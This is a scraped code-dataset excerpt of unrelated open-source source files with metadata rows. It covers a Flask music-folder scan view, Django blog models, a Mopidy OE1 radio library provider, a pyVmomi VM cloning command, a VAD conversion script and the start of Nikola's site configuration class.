scanner.scan(folder)
else:
status, folder = FolderManager.get(store, id)
if status != FolderManager.SUCCESS:
flash(FolderManager.error_str(status))
return redirect(url_for('folder_index'))
scanner.scan(folder)
scanner.finish()
added, deleted = scanner.stats()
store.commit()
flash('Added: %i artists, %i albums, %i tracks' % (added[0], added[1], added[2]))
flash('Deleted: %i artists, %i albums, %i tracks' % (deleted[0], deleted[1], deleted[2]))
return redirect(url_for('folder_index'))
| agpl-3.0 | 8,356,012,142,312,733,000 | 29.571429 | 90 | 0.718069 | false |
janusnic/dj-21v | unit_06/mysite/blog/models.py | 1 | 1855 | from django.db import models
import datetime
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
class Category(models.Model):
name = models.CharField(max_length=100)
slug = models.SlugField(max_length=100, unique=True, verbose_name='slug')
description = models.TextField(max_length=4096)
def __str__(self):
return '%s' % (self.name)
class Tag(models.Model):
name = models.CharField(max_length=100, unique=True)
slug = models.SlugField(max_length=100, unique=True, verbose_name='slug')
def __str__(self):
return '%s' % (self.name)
@python_2_unicode_compatible
class Article(models.Model):
ARTICLE_STATUS = (
('D', 'Not Reviewed'),
('P', 'Published'),
('E', 'Expired'),
)
title = models.CharField(max_length=100, unique=True)
slug = models.SlugField(max_length=100, unique=True, verbose_name='slug')
content = models.TextField()
status = models.CharField(max_length=1, choices=ARTICLE_STATUS, default='D')
category = models.ForeignKey(Category, verbose_name="the related category")
tags = models.ManyToManyField(Tag, verbose_name="the related tags", related_name="keyword_set", blank=True)
publish_date = models.DateTimeField(auto_now=True, editable=False, help_text="Please use the following format: <em>YYYY-MM-DD</em>.")
created_date = models.DateTimeField(auto_now_add=True, editable=False)
def was_published_recently(self):
return self.publish_date >= timezone.now() - datetime.timedelta(days=1)
was_published_recently.admin_order_field = 'publish_date'
was_published_recently.boolean = True
was_published_recently.short_description = 'Published recently?'
def __str__(self):
return '%s' % (self.title)
| mit | 8,088,167,505,696,857,000 | 39.326087 | 137 | 0.687871 | false |
tischlda/mopidy-oe1 | mopidy_oe1/library.py | 1 | 5362 | from __future__ import unicode_literals
import logging
import re
from client import OE1Client
from mopidy import backend
from mopidy.models import Ref, Track
logger = logging.getLogger(__name__)
class OE1Uris(object):
ROOT = 'oe1:directory'
LIVE = 'oe1:live'
CAMPUS = 'oe1:campus'
ARCHIVE = 'oe1:archive'
class OE1LibraryProvider(backend.LibraryProvider):
root_directory = Ref.directory(uri=OE1Uris.ROOT, name='OE1')
root = [
Ref.track(uri=OE1Uris.LIVE, name='Live'),
Ref.track(uri=OE1Uris.CAMPUS, name='Campus'),
Ref.directory(uri=OE1Uris.ARCHIVE, name='7 Tage')]
def __init__(self, backend, client=OE1Client()):
super(OE1LibraryProvider, self).__init__(backend)
self.client = client
def browse(self, uri):
try:
library_uri = OE1LibraryUri.parse(uri)
except InvalidOE1Uri, e:
logger.error(e)
return []
if library_uri.uri_type == OE1UriType.ROOT:
return self.root
if library_uri.uri_type == OE1UriType.ARCHIVE:
return self._browse_archive()
if library_uri.uri_type == OE1UriType.ARCHIVE_DAY:
return self._browse_day(library_uri.day_id)
logger.warn('OE1LibraryProvider.browse called with uri '
'that does not support browsing: \'%s\'.' % uri)
return []
def _browse_archive(self):
return [Ref.directory(uri=str(OE1LibraryUri(OE1UriType.ARCHIVE_DAY,
day['id'])),
name=day['label'])
for day in self.client.get_days()]
def _get_track_title(self, item):
return '%s: %s' % (item['time'], item['title'])
def _browse_day(self, day_id):
return [Ref.track(uri=str(OE1LibraryUri(OE1UriType.ARCHIVE_ITEM,
day_id, item['id'])),
name=self._get_track_title(item))
for item in self.client.get_day(day_id)['items']]
def lookup(self, uri):
try:
library_uri = OE1LibraryUri.parse(uri)
except InvalidOE1Uri, e:
logger.error(e)
return []
if library_uri.uri_type == OE1UriType.LIVE:
return [Track(uri=OE1Uris.LIVE, name='Live')]
if library_uri.uri_type == OE1UriType.CAMPUS:
return [Track(uri=OE1Uris.CAMPUS, name='Campus')]
if library_uri.uri_type == OE1UriType.ARCHIVE_DAY:
return self._browse_day(library_uri.day_id)
if library_uri.uri_type == OE1UriType.ARCHIVE_ITEM:
return self._lookup_item(library_uri.day_id, library_uri.item_id)
logger.warn('OE1LibraryProvider.lookup called with uri '
'that does not support lookup: \'%s\'.' % uri)
return []
def _lookup_item(self, day_id, item_id):
item = self.client.get_item(day_id, item_id)
return [Track(uri=str(OE1LibraryUri(OE1UriType.ARCHIVE_ITEM,
day_id, item['id'])),
name=self._get_track_title(item))]
def refresh(self, uri=None):
self.client.refresh()
class OE1LibraryUri(object):
def __init__(self, uri_type, day_id=None, item_id=None):
self.uri_type = uri_type
self.day_id = day_id
self.item_id = item_id
archive_parse_expression = '^' + re.escape(OE1Uris.ARCHIVE) +\
':(?P<day_id>\d{8})(:(?P<item_id>\d+))?$'
archive_parser = re.compile(archive_parse_expression)
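    # Illustrative URI shapes this parser is meant to accept (the day and item ids
    # below are invented examples, not values from the OE1 service):
    #   'oe1:archive'            -> OE1UriType.ARCHIVE
    #   'oe1:archive:20150815'   -> OE1UriType.ARCHIVE_DAY, day_id='20150815'
    #   'oe1:archive:20150815:3' -> OE1UriType.ARCHIVE_ITEM, day_id='20150815', item_id='3'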
@staticmethod
def parse(uri):
if uri == OE1Uris.ROOT:
return OE1LibraryUri(OE1UriType.ROOT)
if uri == OE1Uris.LIVE:
return OE1LibraryUri(OE1UriType.LIVE)
if uri == OE1Uris.CAMPUS:
return OE1LibraryUri(OE1UriType.CAMPUS)
if uri == OE1Uris.ARCHIVE:
return OE1LibraryUri(OE1UriType.ARCHIVE)
matches = OE1LibraryUri.archive_parser.match(uri)
if matches is not None:
day_id = matches.group('day_id')
item_id = matches.group('item_id')
if day_id is not None:
if matches.group('item_id') is not None:
return OE1LibraryUri(OE1UriType.ARCHIVE_ITEM,
day_id, item_id)
return OE1LibraryUri(OE1UriType.ARCHIVE_DAY, day_id)
raise InvalidOE1Uri(uri)
def __str__(self):
if self.uri_type == OE1UriType.ROOT:
return OE1Uris.ROOT
if self.uri_type == OE1UriType.LIVE:
return OE1Uris.LIVE
if self.uri_type == OE1UriType.CAMPUS:
return OE1Uris.CAMPUS
if self.uri_type == OE1UriType.ARCHIVE:
return OE1Uris.ARCHIVE
if self.uri_type == OE1UriType.ARCHIVE_DAY:
return OE1Uris.ARCHIVE + ':' + self.day_id
if self.uri_type == OE1UriType.ARCHIVE_ITEM:
return OE1Uris.ARCHIVE + ':' + self.day_id + ':' + self.item_id
class InvalidOE1Uri(TypeError):
def __init__(self, uri):
super(TypeError, self).__init__(
'The URI is not a valid OE1LibraryUri: \'%s\'.' % uri)
class OE1UriType(object):
ROOT = 0
LIVE = 1
CAMPUS = 2
ARCHIVE = 3
ARCHIVE_DAY = 4
ARCHIVE_ITEM = 5
| apache-2.0 | 2,123,299,529,363,965,000 | 32.304348 | 77 | 0.567326 | false |
D3DeFi/vmcli | lib/modules/clone.py | 1 | 5545 | from pyVmomi import vim
from lib.modules import BaseCommands
from lib.tools import normalize_memory
from lib.tools.argparser import args
from lib.exceptions import VmCLIException
from flavors import load_vm_flavor
class CloneCommands(BaseCommands):
"""clone specific VMware objects, without any further configuration."""
def __init__(self, *args, **kwargs):
super(CloneCommands, self).__init__(*args, **kwargs)
@args('--name', required=True, help='name for a cloned object')
@args('--template', help='template object to use as a source of cloning', map='VM_TEMPLATE')
def execute(self, args):
try:
self.clone_vm(args.name, args.template, args.datacenter, args.folder, args.datastore,
args.cluster, args.resource_pool, args.poweron, args.mem, args.cpu, args.flavor)
except VmCLIException as e:
self.exit(e.message, errno=2)
@args('--flavor', help='flavor to use for a vm cloning')
@args('--datacenter', help='datacenter where to create vm', map='VM_DATACENTER')
@args('--folder', help='folder where to place vm', map='VM_FOLDER')
@args('--datastore', help='datastore where to store vm', map='VM_DATASTORE')
@args('--cluster', help='cluster where to spawn mv', map='VM_CLUSTER')
@args('--resource-pool', help='resource pool, which should be used for vm', map='VM_RESOURCE_POOL')
@args('--mem', help='memory to set for a vm in megabytes', map='VM_MEM')
@args('--cpu', help='cpu count to set for a vm', type=int, map='VM_CPU')
@args('--poweron', help='whether to power on vm after cloning', action='store_true', map='VM_POWERON')
def clone_vm(self, name, template, datacenter=None, folder=None, datastore=None, cluster=None,
resource_pool=None, poweron=None, mem=None, cpu=None, flavor=None):
"""Clones new virtual machine from a template or any other existing machine."""
flavor = load_vm_flavor(flavor)
        # TODO: make the script fail when the user specifies something wrong instead of silently using vCenter defaults.
        # E.g.: './vmcli.py create --folder non-existing' currently picks the root folder of vCenter.
# load needed variables
self.logger.info('Loading required VMware resources...')
if mem:
mem = normalize_memory(mem)
template = self.get_obj('vm', template)
datacenter = self.get_obj('datacenter', datacenter, default=True)
cluster = self.get_obj('cluster', cluster, default=True)
folder = self.get_obj('folder', folder) or datacenter.vmFolder
resource_pool = self.get_obj('resource_pool', resource_pool) or cluster.resourcePool
# Search first for datastore cluster, then for specific datastore
datastore = datastore or template.datastore[0].info.name
ds = self.get_obj('datastore_cluster', datastore)
ds_type = 'cluster'
if not ds:
ds = self.get_obj('datastore', datastore)
ds_type = 'specific'
if not ds:
            self.exit('Neither a datastore cluster nor a specific datastore matches {}. Exiting...'.format(
                datastore))
datastore = ds
if self.get_obj('vm', name):
self.exit('VM with name {} already exists. Exiting...'.format(name))
if not template:
self.exit('Specified template does not exists. Exiting...')
self.logger.info(' * Using datacenter..........{}'.format(datacenter.name))
self.logger.info(' * Using cluster.............{}'.format(cluster.name))
self.logger.info(' * Using folder..............{}'.format(folder.name))
self.logger.info(' * Using datastore...........{}'.format(datastore.name))
self.logger.info(' * Using resource pool.......{}'.format(resource_pool.name))
self.logger.info('Running cloning operation...')
if ds_type == 'cluster':
storagespec = vim.storageDrs.StoragePlacementSpec(
cloneName=name, vm=template, resourcePool=resource_pool, folder=folder, type='clone')
storagespec.cloneSpec = vim.vm.CloneSpec(location=vim.vm.RelocateSpec(pool=resource_pool), powerOn=poweron)
storagespec.cloneSpec.config = vim.vm.ConfigSpec(name=name, memoryMB=mem, numCPUs=cpu, annotation=name)
storagespec.podSelectionSpec = vim.storageDrs.PodSelectionSpec(storagePod=datastore)
storagePlacementResult = self.content.storageResourceManager.RecommendDatastores(storageSpec=storagespec)
            try:
                # Pick the first recommendation, as the vSphere Client does
                drs_key = storagePlacementResult.recommendations[0].key
                if not drs_key:
                    raise ValueError
            except (IndexError, ValueError):
                self.exit('No storage DRS recommendation provided for cluster {}, exiting...'.format(datastore.name))
task = self.content.storageResourceManager.ApplyStorageDrsRecommendation_Task(drs_key)
self.wait_for_tasks([task])
elif ds_type == 'specific':
relocspec = vim.vm.RelocateSpec(datastore=datastore, pool=resource_pool)
configspec = vim.vm.ConfigSpec(name=name, memoryMB=mem, numCPUs=cpu, annotation=name)
clonespec = vim.vm.CloneSpec(config=configspec, location=relocspec, powerOn=poweron)
task = template.Clone(folder=folder, name=name, spec=clonespec)
self.wait_for_tasks([task])
BaseCommands.register('clone', CloneCommands)
| apache-2.0 | 4,840,499,294,122,685,000 | 52.317308 | 119 | 0.645807 | false |
antoniorohit/xbob.spkrec | xbob/spkrec/script/external_vad_conversion.py | 1 | 2026 | #!bin/python
# vim: set fileencoding=utf-8 :
# Elie Khoury <[email protected]>
# Fri Aug 30 11:44:33 CEST 2013
#
# Copyright (C) 2012-2013 Idiap Research Institute, Martigny, Switzerland
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import bob
import time, imp
import xbob.spkrec.preprocessing
import sys
from .. import utils
import os
def main():
"""Executes the main function"""
input_file_list = sys.argv[1] # The input file list
audio_dir = sys.argv[2] # The Audio directory
vad_dir = sys.argv[3] # The VAD directory
out_dir = sys.argv[4] # The Output directory
# ensure output directory
utils.ensure_dir(out_dir)
# Define the processor and the parameters
m_preprocessor_config = imp.load_source('preprocessor', "config/preprocessing/external.py")
preprocessor = xbob.spkrec.preprocessing.External(m_preprocessor_config)
infile=open(input_file_list)
for filename in infile:
filename = filename.strip()
audio_file = str(os.path.join(audio_dir, filename) + '.sph')
if os.path.exists(audio_file):
out_file = str(os.path.join(out_dir, filename) + '.hdf5')
vad_file = str(os.path.join(vad_dir, filename) + '.vad')
# The VAD file is 5 columns text file
# Column 1: segment number
# Column 3: start time
# Column 5: end time
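      # Illustrative sketch of one line under that 5-column layout (values invented;
      # columns 2 and 4 are shown as placeholders since only 1, 3 and 5 are read):
      #   1 x 0.00 x 2.35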
preprocessor(audio_file, out_file, vad_file)
else:
print("Warning: file does not exist: %s" %audio_file)
if __name__ == "__main__":
main()
| gpl-3.0 | -514,649,792,676,167,900 | 32.213115 | 94 | 0.698421 | false |
masayuko/nikola | nikola/nikola.py | 1 | 95558 | # -*- coding: utf-8 -*-
# Copyright © 2012-2015 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""The main Nikola site object."""
from __future__ import print_function, unicode_literals
import io
from collections import defaultdict
from copy import copy
from pkg_resources import resource_filename
import datetime
import locale
import os
import json
import sys
import natsort
try:
from urlparse import urlparse, urlsplit, urlunsplit, urljoin, unquote
except ImportError:
from urllib.parse import urlparse, urlsplit, urlunsplit, urljoin, unquote # NOQA
try:
import pyphen
except ImportError:
pyphen = None
import dateutil.tz
import logging
import lxml.etree
import lxml.html
import html5lib
from yapsy.PluginManager import PluginManager
from blinker import signal
from .post import Post # NOQA
from . import DEBUG, utils
from .plugin_categories import (
Command,
LateTask,
PageCompiler,
CompilerExtension,
MarkdownExtension,
RestExtension,
Task,
TaskMultiplier,
TemplateSystem,
SignalHandler,
ConfigPlugin,
PostScanner,
)
from .feedutil import FeedUtil
if DEBUG:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.ERROR)
# Default "Read more..." link
DEFAULT_INDEX_READ_MORE_LINK = '<p class="more"><a href="{link}">{read_more}…</a></p>'
DEFAULT_FEED_READ_MORE_LINK = '<p><a href="{link}">{read_more}…</a> ({min_remaining_read})</p>'
# Default pattern for translation files' names
DEFAULT_TRANSLATIONS_PATTERN = '{path}.{lang}.{ext}'
config_changed = utils.config_changed
__all__ = ('Nikola',)
# We store legal values for some setting here. For internal use.
LEGAL_VALUES = {
'COMMENT_SYSTEM': [
'disqus',
'facebook',
'googleplus',
'intensedebate',
'isso',
'livefyre',
'muut',
],
'TRANSLATIONS': {
'ar': 'Arabic',
'az': 'Azerbaijani',
'bg': 'Bulgarian',
'bs': 'Bosnian',
'ca': 'Catalan',
('cs', 'cz'): 'Czech',
'da': 'Danish',
'de': 'German',
('el', '!gr'): 'Greek',
'en': 'English',
'eo': 'Esperanto',
'es': 'Spanish',
'et': 'Estonian',
'eu': 'Basque',
'fa': 'Persian',
'fi': 'Finnish',
'fr': 'French',
'hi': 'Hindi',
'hr': 'Croatian',
'hu': 'Hungarian',
'id': 'Indonesian',
'it': 'Italian',
('ja', '!jp'): 'Japanese',
'ko': 'Korean',
'nb': 'Norwegian Bokmål',
'nl': 'Dutch',
'pa': 'Punjabi',
'pl': 'Polish',
'pt': 'Portuguese',
'pt_br': 'Portuguese (Brazil)',
'ru': 'Russian',
'sk': 'Slovak',
'sl': 'Slovene',
'sr': 'Serbian (Cyrillic)',
'sr_latin': 'Serbian (Latin)',
'sv': 'Swedish',
('tr', '!tr_TR'): 'Turkish',
'ur': 'Urdu',
'uk': 'Ukrainian',
'zh_cn': 'Chinese (Simplified)',
},
'_WINDOWS_LOCALE_GUESSES': {
# TODO incomplete
        # some languages may require that the appropriate Microsoft Language Pack be installed.
"bg": "Bulgarian",
"ca": "Catalan",
"de": "German",
"el": "Greek",
"en": "English",
"eo": "Esperanto",
"es": "Spanish",
"fa": "Farsi", # Persian
"fr": "French",
"hr": "Croatian",
"hu": "Hungarian",
"it": "Italian",
"jp": "Japanese",
"nl": "Dutch",
"pl": "Polish",
"pt_br": "Portuguese_Brazil",
"ru": "Russian",
"sl_si": "Slovenian",
"tr_tr": "Turkish",
"zh_cn": "Chinese_China", # Chinese (Simplified)
},
'_TRANSLATIONS_WITH_COUNTRY_SPECIFIERS': {
# This dict is used in `init` in case of locales that exist with a
# country specifier. If there is no other locale that has the same
# language with a different country, ``nikola init`` (but nobody else!)
# will accept it, warning the user about it.
'zh': 'zh_cn',
},
'RTL_LANGUAGES': ('ar', 'fa', 'ur'),
'COLORBOX_LOCALES': defaultdict(
str,
ar='ar',
bg='bg',
ca='ca',
cs='cs',
cz='cs',
da='da',
de='de',
en='',
es='es',
et='et',
fa='fa',
fi='fi',
fr='fr',
hr='hr',
hu='hu',
id='id',
it='it',
ja='ja',
ko='kr', # kr is South Korea, ko is the Korean language
nb='no',
nl='nl',
pl='pl',
pt='pt-BR', # hope nobody will mind
pt_br='pt-BR',
ru='ru',
sk='sk',
sl='si', # country code is si, language code is sl, colorbox is wrong
sr='sr', # warning: this is serbian in Latin alphabet
sr_latin='sr',
sv='sv',
tr='tr',
uk='uk',
zh_cn='zh-CN'
),
'MOMENTJS_LOCALES': defaultdict(
str,
ar='ar',
az='az',
bg='bg',
bn='bn',
bs='bs',
ca='ca',
cs='cs',
cz='cs',
da='da',
de='de',
el='el',
en='en',
eo='eo',
es='es',
et='et',
eu='eu',
fa='fa',
fi='fi',
fr='fr',
hi='hi',
hr='hr',
hu='hu',
id='id',
it='it',
ja='ja',
ko='ko',
nb='nb',
nl='nl',
pl='pl',
pt='pt',
pt_br='pt-br',
ru='ru',
sk='sk',
sl='sl',
sr='sr-cyrl',
sr_latin='sr',
sv='sv',
tr='tr',
uk='uk',
zh_cn='zh-cn'
),
'PYPHEN_LOCALES': {
'bg': 'bg',
'ca': 'ca',
'cs': 'cs',
'cz': 'cs',
'da': 'da',
'de': 'de',
'el': 'el',
'en': 'en',
'es': 'es',
'et': 'et',
'fr': 'fr',
'hr': 'hr',
'hu': 'hu',
'it': 'it',
'nb': 'nb',
'nl': 'nl',
'pl': 'pl',
'pt': 'pt',
'pt_br': 'pt_BR',
'ru': 'ru',
'sk': 'sk',
'sl': 'sl',
'sr': 'sr',
'sv': 'sv',
'uk': 'uk',
},
}
class Nikola(object):
"""Class that handles site generation.
Takes a site config as argument on creation.
"""
def __init__(self, **config):
"""Setup proper environment for running tasks."""
# Register our own path handlers
self.path_handlers = {
'slug': self.slug_path,
'post_path': self.post_path,
'root': self.root_path,
'filename': self.filename_path,
}
self.strict = False
self.posts = []
self.all_posts = []
self.posts_per_year = defaultdict(list)
self.posts_per_month = defaultdict(list)
self.posts_per_tag = defaultdict(list)
self.posts_per_category = defaultdict(list)
self.tags_per_language = defaultdict(list)
self.post_per_file = {}
self.timeline = []
self.pages = []
self._scanned = False
self._template_system = None
self._THEMES = None
self.debug = DEBUG
self.loghandlers = utils.STDERR_HANDLER # TODO remove on v8
self.colorful = config.pop('__colorful__', False)
self.invariant = config.pop('__invariant__', False)
self.quiet = config.pop('__quiet__', False)
self._doit_config = config.pop('DOIT_CONFIG', {})
self.original_cwd = config.pop('__cwd__', False)
self.configuration_filename = config.pop('__configuration_filename__', False)
self.configured = bool(config)
self.injected_deps = defaultdict(list)
self.rst_transforms = []
self.template_hooks = {
'extra_head': utils.TemplateHookRegistry('extra_head', self),
'body_end': utils.TemplateHookRegistry('body_end', self),
'page_header': utils.TemplateHookRegistry('page_header', self),
'menu': utils.TemplateHookRegistry('menu', self),
'menu_alt': utils.TemplateHookRegistry('menu_alt', self),
'page_footer': utils.TemplateHookRegistry('page_footer', self),
}
# This is the default config
self.config = {
'ANNOTATIONS': False,
'ARCHIVE_PATH': "",
'ARCHIVE_FILENAME': "archive.html",
'ARCHIVES_ARE_INDEXES': False,
'AUTHOR_PATH': 'authors',
'AUTHOR_PAGES_ARE_INDEXES': False,
'AUTHOR_PAGES_DESCRIPTIONS': {},
'AUTHORLIST_MINIMUM_POSTS': 1,
'BLOG_AUTHOR': 'Default Author',
'BLOG_TITLE': 'Default Title',
'BLOG_DESCRIPTION': 'Default Description',
'BODY_END': "",
'CACHE_FOLDER': 'cache',
'CATEGORY_PATH': None, # None means: same as TAG_PATH
'CATEGORY_PAGES_ARE_INDEXES': None, # None means: same as TAG_PAGES_ARE_INDEXES
'CATEGORY_PAGES_DESCRIPTIONS': {},
'CATEGORY_PAGES_TITLES': {},
'CATEGORY_PREFIX': 'cat_',
'CATEGORY_ALLOW_HIERARCHIES': False,
'CATEGORY_OUTPUT_FLAT_HIERARCHY': False,
'CODE_COLOR_SCHEME': 'default',
'COMMENT_SYSTEM': 'disqus',
'COMMENTS_IN_GALLERIES': False,
'COMMENTS_IN_STORIES': False,
'COMPILERS': {
"rest": ('.txt', '.rst'),
"markdown": ('.md', '.mdown', '.markdown'),
"textile": ('.textile',),
"txt2tags": ('.t2t',),
"bbcode": ('.bb',),
"wiki": ('.wiki',),
"ipynb": ('.ipynb',),
"html": ('.html', '.htm')
},
'CONTENT_FOOTER': '',
'CONTENT_FOOTER_FORMATS': {},
'COPY_SOURCES': True,
'CREATE_MONTHLY_ARCHIVE': False,
'CREATE_SINGLE_ARCHIVE': False,
'CREATE_FULL_ARCHIVES': False,
'CREATE_DAILY_ARCHIVE': False,
'DATE_FORMAT': '%Y-%m-%d %H:%M',
'JS_DATE_FORMAT': 'YYYY-MM-DD HH:mm',
'DATE_FANCINESS': 0,
'DEFAULT_LANG': "en",
'DEPLOY_COMMANDS': {'default': []},
'DISABLED_PLUGINS': [],
'EXTRA_PLUGINS_DIRS': [],
'COMMENT_SYSTEM_ID': 'nikolademo',
'ENABLE_AUTHOR_PAGES': True,
'EXTRA_HEAD_DATA': '',
'FAVICONS': (),
'FEED_LENGTH': 10,
'FILE_METADATA_REGEXP': None,
'ADDITIONAL_METADATA': {},
'FILES_FOLDERS': {'files': ''},
'FILTERS': {},
'FORCE_ISO8601': False,
'GALLERY_FOLDERS': {'galleries': 'galleries'},
'GALLERY_SORT_BY_DATE': True,
'GLOBAL_CONTEXT_FILLER': [],
'GZIP_COMMAND': None,
'GZIP_FILES': False,
'GZIP_EXTENSIONS': ('.txt', '.htm', '.html', '.css', '.js', '.json', '.xml'),
'HIDDEN_AUTHORS': [],
'HIDDEN_TAGS': [],
'HIDDEN_CATEGORIES': [],
'HYPHENATE': False,
'IMAGE_FOLDERS': {'images': ''},
'INDEX_DISPLAY_POST_COUNT': 10,
'INDEX_FILE': 'index.html',
'INDEX_TEASERS': False,
'IMAGE_THUMBNAIL_SIZE': 400,
'INDEXES_TITLE': "",
'INDEXES_PAGES': "",
'INDEXES_PAGES_MAIN': False,
'INDEXES_PRETTY_PAGE_URL': False,
'INDEXES_STATIC': True,
'INDEX_PATH': '',
'IPYNB_CONFIG': {},
'LESS_COMPILER': 'lessc',
'LESS_OPTIONS': [],
'LICENSE': '',
'LINK_CHECK_WHITELIST': [],
'LISTINGS_FOLDERS': {'listings': 'listings'},
'LOGO_URL': '',
'NAVIGATION_LINKS': {},
'MARKDOWN_EXTENSIONS': ['fenced_code', 'codehilite'], # FIXME: Add 'extras' in v8
'MAX_IMAGE_SIZE': 1280,
'MATHJAX_CONFIG': '',
'OLD_THEME_SUPPORT': True,
'OUTPUT_FOLDER': 'output',
'POSTS': (("posts/*.txt", "posts", "post.tmpl"),),
'POSTS_SECTIONS': True,
'POSTS_SECTION_ARE_INDEXES': True,
'POSTS_SECTION_DESCRIPTIONS': "",
'POSTS_SECTION_FROM_META': False,
'POSTS_SECTION_NAME': "",
'POSTS_SECTION_TITLE': "{name}",
'PAGES': (("stories/*.txt", "stories", "story.tmpl"),),
'PANDOC_OPTIONS': [],
'PRETTY_URLS': False,
'FUTURE_IS_NOW': False,
'INDEX_READ_MORE_LINK': DEFAULT_INDEX_READ_MORE_LINK,
'REDIRECTIONS': [],
'ROBOTS_EXCLUSIONS': [],
'GENERATE_ATOM': False,
'FEED_ENCLOSURE': 'link',
'FEED_TEASERS': True,
'FEED_PLAIN': False,
'FEED_PREVIEWIMAGE': True,
'FEED_PREVIEWIMAGE_DEFAULT': None,
'FEED_PUSH': None,
'FEED_READ_MORE_LINK': DEFAULT_FEED_READ_MORE_LINK,
'FEED_LINKS_APPEND_QUERY': False,
'FEED_PATH': '',
'GENERATE_RSS': True,
'RSS_LINK': None,
'RSS_PATH': '',
'SASS_COMPILER': 'sass',
'SASS_OPTIONS': [],
'SEARCH_FORM': '',
'SHOW_BLOG_TITLE': True,
'SHOW_SOURCELINK': True,
'SHOW_UNTRANSLATED_POSTS': True,
'SLUG_AUTHOR_PATH': True,
'SLUG_TAG_PATH': True,
'SOCIAL_BUTTONS_CODE': '',
'SITE_URL': 'https://example.com/',
'STORY_INDEX': False,
'STRIP_INDEXES': False,
'SITEMAP_INCLUDE_FILELESS_DIRS': True,
'TAG_PATH': 'categories',
'TAG_PAGES_ARE_INDEXES': False,
'TAG_PAGES_DESCRIPTIONS': {},
'TAG_PAGES_TITLES': {},
'TAGLIST_MINIMUM_POSTS': 1,
'TEMPLATE_FILTERS': {},
'THEME': 'bootstrap3',
'THEME_COLOR': '#5670d4', # light "corporate blue"
'THEME_REVEAL_CONFIG_SUBTHEME': 'sky',
'THEME_REVEAL_CONFIG_TRANSITION': 'cube',
'THUMBNAIL_SIZE': 180,
'UNSLUGIFY_TITLES': False, # WARNING: conf.py.in overrides this with True for backwards compatibility
'URL_TYPE': 'rel_path',
'USE_BASE_TAG': True,
'USE_BUNDLES': True,
'USE_CDN': False,
'USE_CDN_WARNING': True,
'USE_FILENAME_AS_TITLE': True,
'USE_KATEX': False,
'USE_OPEN_GRAPH': True,
'USE_SLUGIFY': True,
'TIMEZONE': 'UTC',
'WRITE_TAG_CLOUD': True,
'DEPLOY_DRAFTS': True,
'DEPLOY_FUTURE': False,
'SCHEDULE_ALL': False,
'SCHEDULE_RULE': '',
'LOGGING_HANDLERS': {'stderr': {'loglevel': 'WARNING', 'bubble': True}},
'DEMOTE_HEADERS': 1,
'GITHUB_SOURCE_BRANCH': 'master',
'GITHUB_DEPLOY_BRANCH': 'gh-pages',
'GITHUB_REMOTE_NAME': 'origin',
}
# set global_context for template rendering
self._GLOBAL_CONTEXT = {}
self.config.update(config)
# __builtins__ contains useless cruft
if '__builtins__' in self.config:
try:
del self.config['__builtins__']
except KeyError:
del self.config[b'__builtins__']
self.config['__colorful__'] = self.colorful
self.config['__invariant__'] = self.invariant
self.config['__quiet__'] = self.quiet
# Make sure we have sane NAVIGATION_LINKS.
if not self.config['NAVIGATION_LINKS']:
self.config['NAVIGATION_LINKS'] = {self.config['DEFAULT_LANG']: ()}
# Translatability configuration.
self.config['TRANSLATIONS'] = self.config.get('TRANSLATIONS',
{self.config['DEFAULT_LANG']: ''})
utils.TranslatableSetting.default_lang = self.config['DEFAULT_LANG']
self.TRANSLATABLE_SETTINGS = ('BLOG_AUTHOR',
'BLOG_TITLE',
'BLOG_DESCRIPTION',
'LICENSE',
'CONTENT_FOOTER',
'SOCIAL_BUTTONS_CODE',
'SEARCH_FORM',
'BODY_END',
'EXTRA_HEAD_DATA',
'NAVIGATION_LINKS',
'INDEX_READ_MORE_LINK',
'FEED_READ_MORE_LINK',
'INDEXES_TITLE',
'POSTS_SECTION_COLORS',
'POSTS_SECTION_DESCRIPTIONS',
'POSTS_SECTION_NAME',
'POSTS_SECTION_TITLE',
'INDEXES_PAGES',
'INDEXES_PRETTY_PAGE_URL',
# PATH options (Issue #1914)
'TAG_PATH',
'CATEGORY_PATH',
'DATE_FORMAT',
'JS_DATE_FORMAT',
)
self._GLOBAL_CONTEXT_TRANSLATABLE = ('blog_author',
'blog_title',
'blog_desc', # TODO: remove in v8
'blog_description',
'license',
'content_footer',
'social_buttons_code',
'search_form',
'body_end',
'extra_head_data',
'date_format',
'js_date_format',)
# WARNING: navigation_links SHOULD NOT be added to the list above.
# Themes ask for [lang] there and we should provide it.
# We first have to massage JS_DATE_FORMAT, otherwise we run into trouble
if 'JS_DATE_FORMAT' in self.config:
if isinstance(self.config['JS_DATE_FORMAT'], dict):
for k in self.config['JS_DATE_FORMAT']:
self.config['JS_DATE_FORMAT'][k] = json.dumps(self.config['JS_DATE_FORMAT'][k])
else:
self.config['JS_DATE_FORMAT'] = json.dumps(self.config['JS_DATE_FORMAT'])
for i in self.TRANSLATABLE_SETTINGS:
try:
self.config[i] = utils.TranslatableSetting(i, self.config[i], self.config['TRANSLATIONS'])
except KeyError:
pass
# Handle CONTENT_FOOTER properly.
# We provide the arguments to format in CONTENT_FOOTER_FORMATS.
